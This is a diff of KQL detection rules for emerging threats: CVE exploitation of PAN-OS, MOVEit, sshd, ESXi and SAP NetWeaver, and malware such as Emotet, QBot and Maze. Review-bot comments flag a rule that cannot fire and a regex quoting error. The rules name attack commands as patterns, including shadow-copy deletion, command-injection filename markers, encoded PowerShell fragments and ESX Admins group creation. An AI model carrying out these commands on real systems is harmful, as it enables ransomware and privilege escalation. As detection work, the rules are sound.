+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\wermgr.exe" and (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "powershell_ise.EXE", "powershell.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
index fb1edcad..18e47b3f 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
@@ -1,10 +1,10 @@
-// Title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-23
-// Level: medium
-// Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: medium
+// Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+
+DeviceFileEvents
 | where (FolderPath contains ":\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\" and FolderPath endswith "\\Report.wer") and (not((FolderPath contains "\\ReportArchive\\AppCrash_" or FolderPath contains "\\ReportArchive\\AppHang_" or FolderPath contains "\\ReportArchive\\Critical_" or FolderPath contains "\\ReportArchive\\Kernel_" or FolderPath contains "\\ReportArchive\\NonCritical_")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
index 75b24ef8..a8824448 100644
--- a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
@@ -1,13 +1,13 @@
-// Title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2024-04-25
-// Level: medium
-// Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.
-// As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2024-3400, detection.emerging-threats
-// False Positives:
-// - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely.
-
-DeviceFileEvents
+// Title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.
+// As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-3400, detection.emerging-threats
+// False Positives:
+// - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely.
+
+DeviceFileEvents
 | where (FolderPath contains "{IFS}" or FolderPath contains "base64" or FolderPath contains "bash" or FolderPath contains "curl" or FolderPath contains "http") and FolderPath startswith "/opt/panlogs/tmp/device_telemetry/"
\ No newline at end of file
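Review bot: The new side filters `DeviceFileEvents` on `FolderPath startswith "/opt/panlogs/tmp/device_telemetry/"`, which is a PAN-OS appliance filesystem path, but DeviceFileEvents is populated by the Defender for Endpoint sensor on onboarded hosts, and a PAN-OS firewall is not something that sensor runs on as far as I know; in this backend the rule will presumably never produce a hit, which is worse than having no rule because it suggests coverage that does not exist. The rule body is unchanged by this commit, so this is a pre-existing gap rather than something the reconversion introduced. A header line would make the limitation explicit: `// Note: requires PAN-OS filesystem telemetry to be ingested into DeviceFileEvents; the MDE sensor does not provide it, so verify the log source before relying on this rule.`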
diff --git a/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql b/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql
index d029b8b8..b23c06eb 100644
--- a/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential Emotet Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-09-30
-// Level: high
-// Description: Detects all Emotet like process executions that are not covered by the more generic rules
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Emotet Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-09-30
+// Level: high
+// Description: Detects all Emotet like process executions that are not covered by the more generic rules
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or ProcessCommandLine contains "JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ" or ProcessCommandLine contains "QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA" or ProcessCommandLine contains "kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA" or ProcessCommandLine contains "IgAoACcAKgAnACkAOwAkA" or ProcessCommandLine contains "IAKAAnACoAJwApADsAJA" or ProcessCommandLine contains "iACgAJwAqACcAKQA7ACQA" or ProcessCommandLine contains "JABGAGwAeAByAGgAYwBmAGQ" or ProcessCommandLine contains "PQAkAGUAbgB2ADoAdABlAG0AcAArACgA" or ProcessCommandLine contains "0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA" or ProcessCommandLine contains "9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA") and (not((ProcessCommandLine contains "fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ" or ProcessCommandLine contains "wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA" or ProcessCommandLine contains 
"8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql
index 83716e84..a1bc3e71 100644
--- a/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql
@@ -1,10 +1,10 @@
-// Title: Potential Exploitation Attempt From Office Application
-// Author: Christian Burkard (Nextron Systems), @SBousseaden (idea)
-// Date: 2022-06-02
-// Level: high
-// Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Exploitation Attempt From Office Application
+// Author: Christian Burkard (Nextron Systems), @SBousseaden (idea)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "../../../.." or ProcessCommandLine contains "..\\..\\..\\.." or ProcessCommandLine contains "..//..//..//..") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
index a54eeafb..0336753c 100644
--- a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
@@ -1,12 +1,12 @@
-// Title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
-// Author: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke
-// Date: 2024-04-01
-// Level: high
-// Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2024-3094, detection.emerging-threats
-// False Positives:
-// - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with "sh -c" or "bash -c"
-
-DeviceProcessEvents
+// Title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
+// Author: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke
+// Date: 2024-04-01
+// Level: high
+// Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-3094, detection.emerging-threats
+// False Positives:
+// - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with "sh -c" or "bash -c"
+
+DeviceProcessEvents
 | where (ProcessCommandLine startswith "bash -c" or ProcessCommandLine startswith "sh -c") and InitiatingProcessFolderPath endswith "/sshd" and AccountName =~ "root"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
index e78bde86..de7a844d 100644
--- a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql
@@ -1,12 +1,12 @@
-// Title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
-// Author: frack113
-// Date: 2024-07-29
-// Level: high
-// Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins".
-// This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
-// VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2024-37085, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
+// Author: frack113
+// Date: 2024-07-29
+// Level: high
+// Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins".
+// This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
+// VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-37085, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "/add" and ProcessCommandLine contains "/domain" and ProcessCommandLine contains "ESX Admins" and ProcessCommandLine contains "group") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) or ((ProcessCommandLine contains "New-ADGroup" and ProcessCommandLine contains "ESX Admins") and ((FolderPath endswith "\\PowerShell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.exe", "pwsh.dll"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql b/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql
index 38ce5982..afea09da 100644
--- a/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential Goofy Guineapig Backdoor Activity
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-05-14
-// Level: high
-// Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Goofy Guineapig Backdoor Activity
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-14
+// Level: high
+// Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "choice /t %d /d y /n >nul"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
index f8b17238..bef6bc6f 100644
--- a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql
@@ -1,11 +1,11 @@
-// Title: Potential KamiKakaBot Activity - Lure Document Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2024-03-22
-// Level: medium
-// Description: Detects the execution of a Word document via the WinWord Start Menu shortcut.
-// This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential KamiKakaBot Activity - Lure Document Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-03-22
+// Level: medium
+// Description: Detects the execution of a Word document via the WinWord Start Menu shortcut.
+// This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/c " and ProcessCommandLine contains ".lnk ~" and ProcessCommandLine contains "Start Menu\\Programs\\Word") and ProcessCommandLine endswith ".doc" and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql
index 34337005..a8e307ec 100644
--- a/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential Maze Ransomware Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-05-08
-// Level: critical
-// Description: Detects specific process characteristics of Maze ransomware word document droppers
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002, attack.t1047, attack.impact, attack.t1490, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Maze Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-08
+// Level: critical
+// Description: Detects specific process characteristics of Maze ransomware word document droppers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.t1047, attack.impact, attack.t1490, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith ".tmp" and InitiatingProcessFolderPath endswith "\\WINWORD.exe") or (ProcessCommandLine endswith "shadowcopy delete" and FolderPath endswith "\\wmic.exe" and InitiatingProcessFolderPath contains "\\Temp\\") or (ProcessCommandLine contains "\\..\\..\\system32" and ProcessCommandLine endswith "shadowcopy delete")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
index 9e1f9678..7dac7d99 100644
--- a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
@@ -1,15 +1,15 @@
-// Title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
-// Author: @kostastsale
-// Date: 2023-06-01
-// Level: medium
-// Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.
-// MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
-// Hunting Opportunity
-// Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats
-// False Positives:
-// - Initial software installation and software updates.
-
-DeviceProcessEvents
+// Title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
+// Author: @kostastsale
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.
+// MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
+// Hunting Opportunity
+// Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats
+// False Positives:
+// - Initial software installation and software updates.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\csc.exe" and InitiatingProcessCommandLine contains "moveitdmz pool" and InitiatingProcessFolderPath endswith "\\w3wp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql b/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql
index fa85f495..8a791bae 100644
--- a/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential QBot Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-10-01
-// Level: critical
-// Description: Detects potential QBot activity by looking for process executions used previously by QBot
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential QBot Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-01
+// Level: critical
+// Description: Detects potential QBot activity by looking for process executions used previously by QBot
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\wscript.exe" and InitiatingProcessFolderPath endswith "\\WinRAR.exe") or ProcessCommandLine contains " /c ping.exe -n 6 127.0.0.1 & type " or (ProcessCommandLine contains "regsvr32.exe" and ProcessCommandLine contains "C:\\ProgramData" and ProcessCommandLine contains ".tmp")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql b/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql
index 41679e16..acab6340 100644
--- a/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql
@@ -1,10 +1,10 @@
-// Title: Potential Raspberry Robin Dot Ending File
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-28
-// Level: high
-// Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Raspberry Robin Dot Ending File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-28
+// Level: high
+// Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ "']{1}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
index 28a6bee9..c1b9e1cc 100644
--- a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql
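Review bot: The context line `| where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ "']{1}"` carries a bare double quote inside a double-quoted KQL string literal (`[ "']`), so the literal ends at `[ ` and the remainder is a parse error; the rule cannot be executed as emitted. The fix is to escape that quote: `| where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}"`. Because both sides of the hunk are byte-identical, this looks like a backend escaping issue that the reconversion in this commit carried over rather than fixed, so other rules whose regexes contain a `"` are presumably affected the same way and worth grepping for.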
@@ -1,13 +1,13 @@
-// Title: Potential SAP NetWeaver Webshell Creation
-// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-04-28
-// Level: medium
-// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
-// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
-// False Positives:
-// - Legitimate creation of jsc or java files in these locations
-
-DeviceFileEvents
+// Title: Potential SAP NetWeaver Webshell Creation
+// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-28
+// Level: medium
+// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
+// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
+// False Positives:
+// - Legitimate creation of jsc or java files in these locations
+
+DeviceFileEvents
 | where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work" or FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
index 8b541c12..743b351e 100644
--- a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql
@@ -1,13 +1,13 @@
-// Title: Potential SAP NetWeaver Webshell Creation - Linux
-// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-04-28
-// Level: medium
-// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
-// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
-// False Positives:
-// - Legitimate creation of jsc or java files in these locations
-
-DeviceFileEvents
+// Title: Potential SAP NetWeaver Webshell Creation - Linux
+// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-28
+// Level: medium
+// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
+// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats
+// False Positives:
+// - Legitimate creation of jsc or java files in these locations
+
+DeviceFileEvents
 | where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/" or FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql
index 8d6a2a38..9791ec11 100644
--- a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql
@@ -1,12 +1,12 @@
-// Title: Potential SNAKE Malware Installation Binary Indicator
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-04
-// Level: high
-// Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential SNAKE Malware Installation Binary Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine in~ ("jpinst.exe", "jpinst", "jpsetup.exe", "jpsetup")) or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql
index de289055..821c449b 100644
--- a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql
@@ -1,12 +1,12 @@
-// Title: Potential SNAKE Malware Installation CLI Arguments Indicator
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-04
-// Level: high
-// Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential SNAKE Malware Installation CLI Arguments Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "\\s[a-fA-F0-9]{64}\\s[a-fA-F0-9]{16}"
